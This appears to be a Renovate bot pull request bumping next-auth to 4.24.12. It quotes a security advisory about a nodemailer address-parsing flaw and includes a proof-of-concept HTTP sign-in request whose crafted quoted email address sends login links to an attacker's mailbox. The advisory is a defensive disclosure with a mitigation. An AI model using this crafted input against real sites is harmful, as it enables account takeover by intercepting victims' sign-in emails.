stub icon indicating copy to clipboard operation
stub copied to clipboard

Published 20 hours ago verified publisher icon Snazzah

chore(deps): update dependency next-auth to v4.24.12 [security]

Open renovate[bot] opened this issue 1 month ago • 1 comments

This PR contains the following updates:

Package Change Age Confidence
next-auth (source) 4.24.7 -> 4.24.12 age confidence

GitHub Vulnerability Alerts

GHSA-5jpx-9hw9-2fx4

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"[email protected]"@​victim.com

is parsed incorrectly and results in the message being delivered to [email protected] (attacker) instead of "<[email protected]>@&#8203;victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version Afftected
4.24.11 Yes
5.0.0-beta.29 Yes

POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@&#8203;auth/prisma-adapter"
import { prisma } from "@&#8203;/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "[email protected]",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})


POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin
Screenshot from 2025-10-25 21-15-25 Screenshot from 2025-10-25 21-14-47

Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

Release Notes

nextauthjs/next-auth (next-auth)

v4.24.12

Compare Source

v4.24.11

Compare Source

v4.24.10

Compare Source

What's Changed

Full Changelog: https://github.com/nextauthjs/next-auth/compare/[email protected]@4.24.10

v4.24.9

Compare Source

What's Changed

New Contributors

Full Changelog: https://github.com/nextauthjs/next-auth/compare/[email protected]@4.24.9

v4.24.8

Compare Source

What's Changed

New Contributors

Full Changelog: https://github.com/nextauthjs/next-auth/compare/[email protected]@4.24.8

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • [ ] If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

renovate[bot] avatar Oct 29 '25 17:10 renovate[bot]

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: yarn.lock
/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22555
  const isURL = URL.canParse(range);
                    ^

TypeError: URL.canParse is not a function
    at parseSpec (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22555:21)
    at Object.getSpec (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22704:55)
    at Engine.findProjectSpec (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22922:31)
    at async Engine.executePackageManagerRequest (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:22961:24)
    at async Object.runMain (/opt/containerbase/tools/corepack/0.34.4/16.20.2/node_modules/corepack/dist/lib/corepack.cjs:23667:7)

renovate[bot] avatar Oct 29 '25 17:10 renovate[bot]